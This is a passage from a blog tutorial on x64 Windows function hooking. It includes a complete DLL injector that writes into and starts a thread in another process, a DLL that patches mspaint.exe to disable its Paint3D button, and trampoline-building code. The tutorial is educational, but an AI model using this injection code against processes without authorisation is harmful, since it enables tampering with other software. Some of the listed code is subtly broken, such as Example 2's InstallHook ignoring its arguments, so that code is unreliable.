    memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

int main()
{
    InstallHook(AddColors, ReturnRed);
    Gdiplus::ARGB col = AddColors(0xFF000000, 0x000000FF);
    printf("%x\n", col);
    return 0;
}

This is all we need to know to start installing hooks in programs we have source access to, but there’s an annoying gap between that and being able to hook a running instance of a program. We’ll bridge that gap with the next example.

Example 2: Hooking Functions in a Running Program

The second example program we’re going to build will disable the “Edit With Paint3D” button in a running instance of mspaint.exe.

There are 2 new hurdles we have to overcome in order to install a hook in a running program: getting the target program to execute our hooking logic, and figuring out the address of the function we want to hook. We’ll tackle these in order.

Our mission is to keep the Paint3D button from accomplishing its mission.

Getting Code Into a Running Process

The simplest way to get an arbitrary process to execute hooking logic is to build that logic into a DLL and use DLL injection to get that code into the target process’ memory.

The nuts and bolts of how DLL injection work are beyond the scope of this blog post, but if you want to learn more, check out this article. I’ve included the code for a basic DLL injection program in the collapsable box below. This is the code that the example program will use to inject its dll into mspaint.exe.

Full DLL Injection Code (click to expand)

//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process
// usage: Injector_LoadLibrary <process name> <path to dll> 

#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h

void printHelp()
{
  printf("Injector_LoadLibrary\nUsage: Injector_LoadLibrary <process name> <path to dll>\n");
}

void createRemoteThread(DWORD processID, const char* dllPath)
{
  HANDLE handle = OpenProcess(
    PROCESS_QUERY_INFORMATION | //Needed to get a process' token
    PROCESS_CREATE_THREAD |    //for obvious reasons
    PROCESS_VM_OPERATION |    //required to perform operations on address space of process (like WriteProcessMemory)
    PROCESS_VM_WRITE,  //required for WriteProcessMemory
    FALSE,      //don't inherit handle
    processID);

  if (handle == NULL)
  {
    fprintf(stderr, "Could not open process with pid: %lu\n", processID);
    return;
  }

  //once the process is open, we need to write the name of our dll to that process' memory
  size_t dllPathLen = strlen(dllPath);
  void* dllPathRemote = VirtualAllocEx(
    handle,
    NULL, //let the system decide where to allocate the memory
    dllPathLen,
    MEM_COMMIT, //actually commit the virtual memory
    PAGE_READWRITE); //mem access for committed page
  
  if (!dllPathRemote)
  {
    fprintf(stderr, "Could not allocate %zd bytes in process with pid: %lu\n", dllPathLen, processID);
    return;
  }

  BOOL writeSucceeded = WriteProcessMemory(
    handle,
    dllPathRemote,
    dllPath,
    dllPathLen,
    NULL);
  
  if (!writeSucceeded)
  {
    fprintf(stderr, "Could not write %zd bytes to process with pid %lu\n", dllPathLen, processID);
    return;
  }

  //now get address of LoadLibraryW function inside Kernel32.dll
  //TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"
  PTHREAD_START_ROUTINE loadLibraryFunc = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryA");
  if (loadLibraryFunc == NULL)
  {
    fprintf(stderr, "Could not find LoadLibraryA function inside kernel32.dll\n");
    return;
  }

  //now create a thread in remote process that loads our target dll using LoadLibraryA

  HANDLE remoteThread = CreateRemoteThread(
    handle,
    NULL, //default thread security
    0, //stack size for thread
    loadLibraryFunc, //pointer to start of thread function (for us, LoadLibraryA)
    dllPathRemote, //pointer to variable being passed to thread function
    0, //0 means the thread runs immediately after creation
    NULL); //we don't care about getting back the thread identifier

  if (remoteThread == NULL)
  {
    fprintf(stderr, "Could not create remote thread.\n");
    return;
  }
  else
  {
    fprintf(stdout, "Success! remote thread started in process %d\n", processID);
  }

  // Wait for the remote thread to terminate
  WaitForSingleObject(remoteThread, INFINITE);

  //once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down
  VirtualFreeEx(handle, dllPathRemote, 0, MEM_RELEASE);
  CloseHandle(remoteThread);
  CloseHandle(handle);
}

DWORD findPidByName(const char* name)
{
  HANDLE h;
  PROCESSENTRY32 singleProcess;
  h = CreateToolhelp32Snapshot( //takes a snapshot of specified processes
    TH32CS_SNAPPROCESS, //get all processes
    0); //ignored for SNAPPROCESS

  singleProcess.dwSize = sizeof(PROCESSENTRY32);

  do {

    if (strcmp(singleProcess.szExeFile, name) == 0)
    {
      DWORD pid = singleProcess.th32ProcessID;
      printf("PID Found: %lu\n", pid);
      CloseHandle(h);
      return pid;
    }

  } while (Process32Next(h, &singleProcess));

  CloseHandle(h);

  return 0;
}

int main(int argc, const char** argv)
{
  if (argc != 3)
  {
    printHelp();
  }

  createRemoteThread(findPidByName(argv[1]), argv[2]);

  return 0;
}

The code for the dll we’re going to inject is basically identical to the last example except that main() will be replaced by DllMain(), and we need to do some extra work to get a pointer to the function we want to hook. With those concerns in mind, the skeleton of Example 2’s dll looks like this:

//source for a hooking dll that will be injected into mspaint.exe

#include <Windows.h>
#include <stdint.h>
#include <Psapi.h>

void* AllocatePageNearAddress(void* targetAddr)
{
  //same as before
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
  //same as before
}

void InstallHook(void* func2hook, void* payloadFunction)
{
  //same as before
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    InstallHook(0x0, 0x0); //we'll fill this in later
  }
  return true;
}

What Function Do We Need to Hook?

Since our goal is to disable the “Edit With Paint3D” button, we need to find the mspaint.exe function that handles that button press. We know that the “Edit With Paint3D” button eventually launches a Paint3D process, so we can be reasonably sure that a function like CreateProcessA() or OpenProcess() gets called at some point during the button handling function. Blindly hooking either of these functions and redirecting them to an empty function doesn’t work (I tried), but throwing some breakpoints on them is as good a place to start as any.

If we look at the functions imported by mspaint in a debugger (like x64dbg), we can see that it is in fact importing OpenProcess(), so our first step is to throw a breakpoint there and then see what happens when we press the paint3d button.

It turns out that our breakpoint does get hit in response to the button click, which is fantastic. If we switch over to the callstack view while we’re stopped at the breakpoint, we can see a couple of mspaint.exe functions much higher up in the stack. It’s possible that the one of these that’s highest in the callstack is the button handler function we’re after.

Going to the address shown for that function brings us into middle of a function body. What we’re after is the relative virtual address (RVA) of the beginning of this function. x64dbg makes this really easy. All we need to do is scroll up until we find the first instruction for the function, then right click on the address of that instruction and select “Copy->RVA.” In my version of mspaint.exe, the RVA of this function is 0x4AA40.

I’m going to save us some trial and error here and reveal that 0x4AA40 ends up not being the address we need. The real button handler runs on a different thread. Hooking 0x4AA40 and redirecting it to an empty function disables the Paint3D button, but only if the current document is empty.

I wish I had a better procedure to share, but my next step after realizing the above was to retry the same procedure except draw something in paint before I clicked the Paint3D button. The callstack I got then had a number of calls inside uiribbon.dll, and the highest mspaint.exe function in that stack ended up being the button handler. Its RVA was 0x6C6F0.

Turning an RVA Into a Runtime Memory Address

RVAs are addresses which are relative to the base address of the module they’re located in. Since programs (and individual modules, thanks to ASLR) can be loaded into memory at different locations across multiple runs of the same program, having the RVA of a function means that we can reliably get that function’s address, no matter where the process is loaded in memory.

In this case, our target function is implemented inside the base module of the process (since it isn’t imported from a dll), so we need to find the base address of the mspaint.exe module. We can do this with the function below.

uint64_t GetBaseModuleForProcess()
{
  HANDLE process = GetCurrentProcess();
  HMODULE processModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
  EnumProcessModules(process, processModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  CHAR processName[256];
  GetModuleFileNameEx(process, NULL, processName, 256); //a null module handle gets the process name
  _strlwr_s(processName, 256);

  HMODULE module = 0; //An HMODULE is the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    GetModuleFileNameEx(process, processModules[i], moduleName, 256);

    _fullpath(absoluteModuleName, moduleName, 256);
    _strlwr_s(absoluteModuleName, 256);

    if (strcmp(processName, absoluteModuleName) == 0)
    {
      module = processModules[i];
      break;
    }
  }

  return (uint64_t)module;
}

HMODULES are actually pointers to the location of a module in memory, so the cast to a uint64_t in the above example is mostly for convenience. In order to get the address of our target function, we’ll need to add the function’s RVA to this base module address.

void* GetFunc2HookAddr()
{
    uint64_t functionRVA = 0x6C6F0;
    uint64_t func2HookAddr = GetBaseModuleForProcess() + functionRVA;
    return (void*)func2HookAddr;
}

If we were hooking a function that was imported from a dll, we’d need to modify the GetBaseMdouleForProcess() function to let us specify the name of the module that we were after, rather than being hardcoded to find the base. We’ll do this in the fourth example in this post, but you can also see an example of this in the code for my hooking-by-example repo here.

Putting It All Together

Now that we have a function to hook, we need to do is to redirect it to an empty payload function to disable it. This is straightforward as it sounds:

int NullPaint3DButtonHandler()
{
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    InstallHook(GetFunc2HookAddr(), NullPaint3DButtonHandler);
  }
  return true;
}

We got a bit lucky here because the button handling function doesn’t have a significant return value (or at least, returning 0 from it is valid). The smart way to approach this would probably be to spend some time in the debugger really understanding what this button handling function does, so that we could write a payload that we knew wasn’t going to break anything, but sometimes it’s better to be lucky than smart.

All we need to do to finish things off is add the implementation for GetFunc2HookAddr() and the payload function into our example dll. The end result is a dll that disables the “Edit with Paint3D” button when injected into mspaint, exactly as we planned. The full source for this example is in the collapsable bow below.

Full Code for Example 2 (click to expand)

#include <Windows.h>
#include <stdint.h>
#include <Psapi.h>

void* AllocatePageNearAddress(void* targetAddr)
{
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

  uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
  uint64_t minAddr = min(startAddr - 0x7FFFFF00, (uint64_t)sysInfo.lpMinimumApplicationAddress);
  uint64_t maxAddr = max(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);

  uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

  uint64_t pageOffset = 1;
  while (1)
  {
    uint64_t byteOffset = pageOffset * PAGE_SIZE;
    uint64_t highAddr = startPage + byteOffset;
		uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

    bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

    if (highAddr < maxAddr)
    {
      void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr)
        return outAddr;
    }

    if (lowAddr > minAddr)
    {
      void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr != nullptr)
        return outAddr;
    }

    pageOffset++;

    if (needsExit)
    {
      break;
    }
  }

  return nullptr;
}
uint64_t GetBaseModuleForProcess()
{
  HANDLE process = GetCurrentProcess();
  HMODULE processModules[1024];
  DWORD numBytesWrittenInModuleArray = 0;
  EnumProcessModules(process, processModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

  DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
  CHAR processName[256];
  GetModuleFileNameEx(process, NULL, processName, 256); //a null module handle gets the process name
  _strlwr_s(processName, 256);

  HMODULE module = 0; //An HMODULE is the DLL's base address 

  for (DWORD i = 0; i < numRemoteModules; ++i)
  {
    CHAR moduleName[256];
    CHAR absoluteModuleName[256];
    GetModuleFileNameEx(process, processModules[i], moduleName, 256);

    _fullpath(absoluteModuleName, moduleName, 256);
    _strlwr_s(absoluteModuleName, 256);

    if (strcmp(processName, absoluteModuleName) == 0)
    {
      module = processModules[i];
      break;
    }
  }

  return (uint64_t)module;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
  uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
            0x41, 0xFF, 0xE2 };

  uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
  memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
  memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

void InstallHook(void* targetFunction, void* payloadFunction)
{
  uint64_t functionRVA = 0x6C6F0;
  uint64_t func2HookAddr = GetBaseModuleForProcess() + functionRVA;
  void* func2hook = (void*)func2HookAddr;

  void* relayFuncMemory = AllocatePageNearAddress(func2hook);
  WriteAbsoluteJump64(relayFuncMemory, NullPaint3DButtonHandler); //write relay func instructions

  //now that the relay function is built, we need to install the E9 jump into the target func,
  //this will jump to the relay function
  DWORD oldProtect;
  VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

  const uint64_t relAddr = (uint64_t)relayFuncMemory - ((uint64_t)func2hook + sizeof(jmpInstruction));
  memcpy(jmpInstruction + 1, &relAddr, 4);

  //install the hook
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

void* GetFunc2HookAddr()
{
  uint64_t functionRVA = 0x6C6F0; 
  uint64_t func2HookAddr = GetBaseModuleForProcess() + functionRVA;
  return (void*)func2HookAddr;
}

int NullPaint3DButtonHandler()
{
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    InstallHook(GetFunc2HookAddr(), NullPaint3DButtonHandler);
  }
  return true;
}

Function Hooking for Big Kids

The previous examples technically hooked a couple functions, but did so at the cost of destroying their original functionality. This meant that we couldn’t do things like modify function arguments being passed to the original functions, or add logging while preserving the original logic of the hooked programs. Real function hooking doesn’t have to make this trade, and our next two examples won’t either.

So far, the hooks we’ve created have had 3 parts: the hooked function, the relay function, and the hook payload. Now we need to add another step in this process, called a trampoline. With this new step, our hook process looks like this:

Rather than simply replace the initial instructions in the hooked function, we’re going to use those instructions to build a trampoline that we can call from a payload function when we want to execute the original version of the hooked function. A hook payload that uses a trampoline might look like this:

Gdiplus::ARGB(*AddColorsTrampoline)(Gdiplus::ARGB left, Gdiplus::ARGB right);
Gdiplus::ARGB AddColorHookPayload(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
  //perform some new action
  printf("Hook executed\n");

  //replace one of the arguments being used to call
  //the hooked function
  return AddColorsTrampoline(0xFFFF0000, right);
}

At a super high level, trampolines need to do two things:

Execute the instructions that were overwritten when the hook jmp was installed in the hooked function.
Jump back to the body of the hooked function AFTER the installed jump instruction, so that the rest of the function can continue like normal.

The first item on this list is really easy to get working for contrived cases, but really difficult to get right for real world use. Consider the following assembly (shown with the addresses of the instructions on the left):

EasyCase:
00007FF7F2691FF0    48 89 4C 24 08       mov         qword ptr [rsp+8],rcx  
00007FF7F2691FF5    55                   push        rbp  
00007FF7F2691FF6    57                   push        rdi  
00007FF7F2691FF7    48 81 EC 08 01 00 00 sub         rsp,108h  
00007FF7F2691FFE    48 8D 6C 24 20       lea         rbp,[rsp+20h]  
        [Rest of function omitted]

This is an example of the “easy” case for creating a trampoline. The first 5 bytes of the function belong to one instruction, and that instruction doesn’t rely on any rip-relative addressing. All we need to do to make a trampoline for this function is copy the first 5 bytes to a buffer before we overwrite them with our hook, and then add a jump to 00007FF6E3521FF5 immediately after it. In assembly, this might look like this:

Trampoline:
48 89 4C 24 08                  mov         qword ptr [rsp+8],rcx  
49 BA F5 1F 69 F2 F7 7F 00 00   mov         r10,7FF7F2691FF5h  
41 FF E2                        jmp         r10

Functions that are harder to hook with a trampoline might have multiple instructions contained in their first 5 bytes, or use instructions with relative operands, like jumps or rip-relative addresses. The snippet below shows an example of a function that has some of these issues.

HardCase:
00007FF72B1F1390     85 C9          test        ecx,ecx  
00007FF72B1F1392     74 26          je          TargetFunc+2Ah (07FF72B1F13BAh)  
00007FF72B1F1394     83 F9 01       cmp         ecx,1  
00007FF72B1F1397     74 0C          je          TargetFunc+15h (07FF72B1F13A5h)
        [Rest of function omitted]

In order to build a trampoline for this function, we’re going to have to get our hands dirty. First of all, we’re going to need to steal the first 7 bytes of this function instead of the first 5, so that we can execute whole instructions in our trampoline. Second, we’re going to need to do something about the je at 00007FF72B1F1392h, since it won’t make sense to do a relative jump once we relocate the instruction.

The next section of this post is going to walk through how to write code that deals with these “hard” issues, but as a bit of a teaser, here’s what the trampoline for this will look like:

HardCase_Trampoline:
85 C9                              test   ecx,ecx  
74 10                              je     000001FA4B770021  ; rewritten jump
83 F9 01                           cmp    ecx,1  
49 BA 97 13 09 C0 F6 7F 00 00      mov    r10,   7FF6C0091397h  ; Jump to hooked function body
41 FF E2                           jmp    r10  
49 BA BA 13 09 C0 F6 7F 00 00      mov    r10,   7FF6C00913BAh  ; Absolute Instruction Table Starts Here
41 FF E2                           jmp    r10

This trampoline can be thought of as being made up of three sections (like a “jump sandwich”, which I thought was very funny when I wrote this at 5 am). It starts with the stolen bytes from the hooked instruction, with the relative instructions rewritten to jump to a later part of the trampoline. The meat of the sandwich is an absolute jump that goes back to the body of the hooked function (to an address after the jmp we installed for the hook). Finally, the bottom of the trampoline are absolute jumps (or calls, if we had any) that go to the addresses that the relative jumps/calls in the stolen bytes actually want to go.

Other sources refer to the absolute instruction table as a jump table, but I’m giving it a fancy name because it’s not going to contain jump instructions exclusively.

Example 3: Building a Trampoline For Code We Can Recompile

We just saw the rough skeleton of the trampoline we’re going to build, now it’s time to write the code to build it. Roughly speaking, our plan of attack looks like this:

“Steal” the first 5+ bytes (rounded up to the nearest whole instruction) of the function we want to hook.
Fixup any rip-relative addressing (like lea rcx,[rip+0xbeef])
For each relative jump or call instruction, calculate the address that it originally intended to reference, and add an absolute jmp/call to that address in the Absolute Instruction Table.
Rewrite the relative instructions in the stolen bytes to jump to their corresponding entry in the Absolute Instruction Table.
Write a jump back to the 6th byte of the hooked function immediately after the stolen instruction bytes, to continue executing the hooked function once the trampoline ends.

These steps won’t be completed sequentially in our final program, but I’ve split them out into discrete steps to make explaining things easier.

For a bit of context, here’s what our final InstallHook() function is going to look like when we’re done. We’re going to be constructing a BuildTrampoline() function which will be given a pointer to some memory to write a trampoline into, and not much else. BuildTrampoline() is going to be called from a modified version of the InstallHook() function we had in our earlier example. Notice that BuildTrampoline() will also return the size, in bytes, of the trampoline that it creates.

void InstallHook(void* func2hook, void* payloadFunc, void** trampolinePtr)
{
  DWORD oldProtect;
  VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

  void* hookMemory = AllocatePageNearAddress(func2hook);
  uint32_t trampolineSize = BuildTrampoline(func2hook, hookMemory);
  *trampolinePtr = hookMemory;

  //create the relay function
  void* relayFuncMemory = (char*)hookMemory + trampolineSize;
  WriteAbsoluteJump64(relayFuncMemory, payloadFunc); //write relay func instructions

  //install the hook
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
  const int32_t relAddr = (int32_t)relayFuncMemory - ((int32_t)func2hook + sizeof(jmpInstruction));
  memcpy(jmpInstruction + 1, &relAddr, 4);
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

The intended use case for the trampoline pointer is to allow payload functions to call trampolines like regular functions, as shown in the snippet below.

void(*TargetFuncTrampoline)(int, float) = nullptr;
void HookPayload(int x, float y)
{
  printf("Hook executed\n");
  TargetFuncTrampoline(x+1, y);
}

Notice that we’re going to build the trampoline in the same “near” memory that the relay function is currently being constructed in. That’s going to make dealing with the rip-relative addressing a lot easier when we get it to it.

Step 1: Stealing Instruction Bytes

In order for our trampoline to work at all, it needs to execute the instructions that are overwritten when we install our hook. To do this, we need to “steal” these instruction bytes from our target function before overwriting them. The verb “steal” is important here - we’re not only going to copy these instruction bytes, we’re also going to replace them with 1 byte NOPs in the target function. That way won’t wind up with any partial instructions when we install the hook jump.

To make sure we steal whole instructions, we need to use a disassembly library. The rest of this article is going to use the Capstone library for all disassembly tasks. Any disassembler will do, but Capstone has some features that are going to make our life easier later on.

This snippet shos how to steal the instructions contained within the first 5 bytes of a target function using Capstone. The StealBytes() function returns a struct with some additional data about the stolen instructions which we’ll use later.

struct X64Instructions
{
  cs_insn* instructions;
  uint32_t numInstructions;
  uint32_t numBytes;
};

X64Instructions StealBytes(void* function)
{
  // Disassemble stolen bytes
  csh handle;
  cs_open(CS_ARCH_X86, CS_MODE_64, &handle);
  cs_option(handle, CS_OPT_DETAIL, CS_OPT_ON); // we need details enabled for relocating RIP relative instrs

  size_t count;
  cs_insn* disassembledInstructions; //allocated by cs_disasm, needs to be manually freed later
  count = cs_disasm(handle, (uint8_t*)function, 20, (uint64_t)function, 20, &disassembledInstructions);

  //get the instructions covered by the first 5 bytes of the original function
  uint32_t byteCount = 0;
  uint32_t stolenInstrCount = 0;
  for (int32_t i = 0; i < count; ++i)
  {
    cs_insn& inst = disassembledInstructions[i];
    byteCount += inst.size;
    stolenInstrCount++;
    if (byteCount >= 5) break;
  }

  //replace instructions in target func wtih NOPs
  memset(function, 0x90, byteCount);

  cs_close(&handle);
  return { disassembledInstructions, stolenInstrCount, byteCount };
}

We’ll call this function right at the start of BuildTrampoline(), so it’s about time we started writing that function too. I’ve found the most intuitive way to structure BuildTrampoline() is to create 3 pointers at the start, each pointing to the next available location in each of the three sections of our trampoline memory. Whenever we write to a location pointed to by one of these pointers, we’ll then increment the pointer by that many bytes, so each of them is always pointing to an available memory address.

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
  X64Instructions stolenInstrs = StealBytes(func2hook);

  uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
  uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
  uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of the 64 bit mov/jmp instruction pair at jumpBackMem
  
  for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
  {
    cs_insn& inst = stolenInstrs.instructions[i];

    //perform any fixup logic to the stolen instructions here

    memcpy(stolenByteMem, inst.bytes, inst.size);
    stolenByteMem += inst.size;
  }
  
  //write jump back to hooked func

  free(stolenInstrs.instructions);
  return uint32_t( (uint8_t*)absTableMem - dstMemForTrampoline);
}

If we only ever needed to hook “easy” functions (as defined earlier), we could skip down to the last step in our trampoline creation procedure now. There’s a lot more legroom required to support less-than-easy functions though.

Step 2: Fixing up RIP-Relative Addressing

One case where our naiive trampoline building function will fail is if any of the stolen instructions contain rip-relative addressing. In x64, there are a lot of instructions that do this, but the easiest example is a function that calls printf.

void PrintHaha()
{
  printf("Haha\n");
}

On my machine, the generated assembly uses an lea instruction to load the string location before the call to printf. The assembly string generated by visual studio makes it look like the lea call is grabbing an absolute address, but the instruction bytes reveal that we’re actually computing the address of the “Haha\n” string by adding an offset to the current value of the instruction pointer.

PrintHaha:
00007FFCB54211E0 48 8D 0D F9 1F 00 00   lea         rcx,[string "Haha\n" (07FFCB54231E0h)]  
00007FFCB54211E7 E9 24 FE FF FF         jmp         printf (07FFCB5421010h)

If we steal the lea instruction verbatim, we’ll get garbage data when we executed the stolen instruction because our instruction pointer will be at a different address. In order to actually use instructions that have rip-relative addressing in our trampoline, we need to fix up the offsets they use to be relative to our trampoline memory.

The first step of this is to detect when an instruction contains a rip-relative operand. Capstone makes this easy.

bool IsRIPRelativeInstr(cs_insn& inst)
{
  cs_x86* x86 = &(inst.detail->x86);

  for (uint32_t i = 0; i < inst.detail->x86.op_count; i++)
  {
    cs_x86_op* op = &(x86->operands[i]);
    
    //mem type is rip relative, like lea rcx,[rip+0xbeef]
    if (op->type == X86_OP_MEM)
    {
      //if we're relative to rip
      return op->mem.base == X86_REG_RIP;
    }
  }

  return false;
}

Relocating an instruction that’s been identified as having a rip-relative operand is a bit more of a bear. Remember how I mentioned that we’re going to put our trampoline in memory that’s within a 32 bit jump of our target function? That’s to try to avoid cases where the new offset we compute is too large to be stored in the existing instruction’s operand.

template<class T>
T GetDisplacement(cs_insn* inst, uint8_t offset)
{
  T disp;
  memcpy(&disp, &inst->bytes[offset], sizeof(T));
  return disp;
}

//rewrite instruction bytes so that any RIP-relative displacement operands
//make sense with wherever we're relocating to
void RelocateInstruction(cs_insn* inst, void* dstLocation)
{
  cs_x86* x86 = &(inst->detail->x86);
  uint8_t offset = x86->encoding.disp_offset;

  uint64_t displacement = inst->bytes[x86->encoding.disp_offset];
  switch (x86->encoding.disp_size)
  {
    case 1: 
    {
      int8_t disp = GetDisplacement<uint8_t>(inst, offset);
      disp -= uint64_t(dstLocation) - inst->address;
      memcpy(&inst->bytes[offset], &disp, 1);
    }break;

    case 2: 
    {
      int16_t disp = GetDisplacement<uint16_t>(inst, offset);
      disp -= uint64_t(dstLocation) - inst->address;
      memcpy(&inst->bytes[offset], &disp, 2);
    }break;

    case 4:
    {
      int32_t disp = GetDisplacement<int32_t>(inst, offset);
      disp -= uint64_t(dstLocation) - inst->address;
      memcpy(&inst->bytes[offset], &disp, 4);
    }break;
  }
}

Shout out to the polyhook source that I stole this logic from.

Plugging these functions into the BuildTrampoline() logic requires adding a check and a function call to the for loop that processes our stolen instructions.

for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
{
  cs_insn& inst = stolenInstrs.instructions[i];

  //perform any fixup logic to the stolen instructions here
  if (IsRIPRelativeInstr(inst))
  {
    RelocateInstruction(&inst, stolenByteMem);
  }
  memcpy(stolenByteMem, inst.bytes, inst.size);
  stolenByteMem += inst.size;
}

Now we can hook our little printf function with wild abandon!

Step 3: Building the Absolute Instruction Table

Next we need to deal with any relative jump or call instructions in our stolen bytes. After all “jump 10 bytes from here” doesn’t mean very much when the instruction has been moved to a new “here.” I have no idea how to handle loop instructions, so the example code will only deal with jmp and call instructions.

Like with the rip-relative operands, the first thing we need to do is identify whether an instruction is one of the flavors of jmp or call that we care about. Identifying relative calls is pretty easy, because there aren’t that many varieties of call instructions, and all the relative versions have opcodes that start with 0xE8.

bool IsRelativeCall(cs_insn& inst)
{
  bool isCall = inst.id == X86_INS_CALL;
  bool startsWithE8 = inst.bytes[0] == 0xE8;
  return isCall && startsWithE8;
}

Identifying jmps is a little harder because there are lots of different types of jmp instructions. Since conditional jumps only come in relative versions, if an instruction’s id says it’s a conditional jump, we know it uses relative addressing. The unconditional “jmp” instruction can use relative addressing, but it can also do things like jump to an address in a register. Thankfully, the behaviour of a jmp is dictated by it’s opcode bytes. Relative jmps start with 0xEB and 0xE9.

bool IsRelativeJump(cs_insn& inst)
{
  bool isAnyJumpInstruction = inst.id >= X86_INS_JAE && inst.id <= X86_INS_JS;
  bool isJmp = inst.id == X86_INS_JMP;
  bool startsWithEBorE9 = inst.bytes[0] == 0xEB || inst.bytes[0] == 0xE9;
  return isJmp ? startsWithEBorE9 : isAnyJumpInstruction;
}

We can use these two functions to quickly identify any stolen instructions that are going to require extra attention:

for (int i = 0; i < stolenInstrs.numInstructions; ++i)
{
  cs_insn& inst = stolenInstrs.instructions[i];
  if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
  {
    return 0; //bail out on loop instructions, I don't have a good way of handling them 
  }
  
  if (IsRIPRelativeInstr(inst))
  {
    RelocateInstruction(&inst, stolenByteMem);
  }
  else if (IsRelativeJump(inst))
  {
  }
  else if (IsRelativeCall(inst))
  {
  }
  memcpy(stolenByteMem, inst.bytes, inst.size);
  stolenByteMem += inst.size;
}

Next We need to figure out the address that the original instruction wanted to go to, and add an absolute jump (or call) to that address to our Absolute Instruction Table. The Capstone library handles calculating the target address of relative instructions for us automatically, which is handy.

Jumps are easier to handle than calls, so we’ll start there. We’ll reuse the WriteAbsoluteJump64 function from earlier in this post to make the code a bit more concise.

uint32_t AddJmpToAbsTable(cs_insn& jmp, uint8_t* absTableMem)
{
  char* targetAddrStr = jmp.op_str; //where the instruction intended to go
  uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);
  WriteAbsoluteJump64(absTableMem, (void*)targetAddr);
  return 13; //size of mov/jmp instrs for absolute jump
}

Note that this function doesn’t rewrite the existing jump instruction, it only adds an absolute version of it to the absolute instruction table (AIT). We’ll handle pointing the original jump to this AIT entry later in this post.

Dealing with calls is a bit different. If we just add an absolute call instruction to our AIT, when that call returns, we’ll wind up at the next jump in the table. That would be bad, so instead we also need to add a jump instruction after our absolute calls to redirect program flow to somewhere more helpful. In this case, we’ll jump to the middle of our trampoline, which is the jump back to the hooked function’s body.

uint32_t AddCallToAbsTable(cs_insn& call, uint8_t* absTableMem, uint8_t* jumpBackToHookedFunc)
{
  char* targetAddrStr = call.op_str; //where the instruction intended to go
  uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);

  uint8_t* dstMem = absTableMem;

  uint8_t callAsmBytes[] =
  {
    0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
    0x41, 0xFF, 0xD2, //call r10
  };
  memcpy(&callAsmBytes[2], &targetAddr, sizeof(void*));
  memcpy(dstMem, &callAsmBytes, sizeof(callAsmBytes));
  dstMem += sizeof(callAsmBytes);

  //after the call, we need to add a second 2 byte jump, which will jump back to the 
    //final jump of the stolen bytes
  uint8_t jmpBytes[2] = { 0xEB, jumpBackToHookedFunc - (absTableMem + sizeof(jmpBytes)) };
  memcpy(dstMem, jmpBytes, sizeof(jmpBytes));

  return sizeof(callAsmBytes) + sizeof(jmpBytes); //15
}

